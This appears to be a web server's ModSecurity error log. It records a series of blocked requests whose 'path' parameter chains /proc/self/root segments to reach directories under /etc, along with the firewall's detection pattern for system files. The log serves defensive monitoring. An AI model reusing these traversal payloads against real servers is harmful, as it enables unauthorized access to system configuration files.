[Mon Mar 16 17:09:48.627505 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.243.203:38026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjjM_BxrYCr4hPDw8AKwAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:49.837511 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:38038] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjjdSswJuvopo3lOh06gAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:51.171289 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:53964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjj7ysWC90G-1nBrBZ_gAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:51.206891 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.244.31:60578] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhjj9SswJuvopo3lOh07AAAAIY"]
[Mon Mar 16 17:09:52.394251 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.243.203:53980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjkM_BxrYCr4hPDw8ALwAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:53.682998 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.243.203:53982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjkaTCbgAP5jq5TehCjQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:54.869612 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:53996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjkrABkC4fWIHEf8EK9gAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:56.162638 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:53998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjlP9ocpUE4ed4uDwIvgAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:57.362338 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:54008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjlf9ocpUE4ed4uDwIwAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:59.074603 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:54022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjlv9ocpUE4ed4uDwIxAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:00.450549 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.243.203:49506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjmKQpVkWug9HeOt9LnQAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:01.799615 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.243.203:49510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjmaQpVkWug9HeOt9LnwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:03.201276 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.243.203:49522] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjm0r9dMAiw-8KANNdSAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:03.594103 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:51230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjm_9ocpUE4ed4uDwIzQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:04.444796 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:49528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjnLysWC90G-1nBrBaAgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:05.791320 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.243.203:49540] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjnaQpVkWug9HeOt9LoAAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:07.002976 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:49542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjn7ABkC4fWIHEf8EK_QAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:08.326032 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:49558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjoP9ocpUE4ed4uDwIzgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:09.564557 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:49564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjobABkC4fWIHEf8ELBAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:10.756469 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:57808] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjorABkC4fWIHEf8ELBgAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:10:10.967519 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:41728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjov9ocpUE4ed4uDwI0gAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:12.114512 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:42944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjpNSswJuvopo3lOh07wAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:10:12.340589 2026] [:error] [pid 15568:tid 140411632822016] [client 74.7.243.203:41740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjpKQpVkWug9HeOt9LoQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
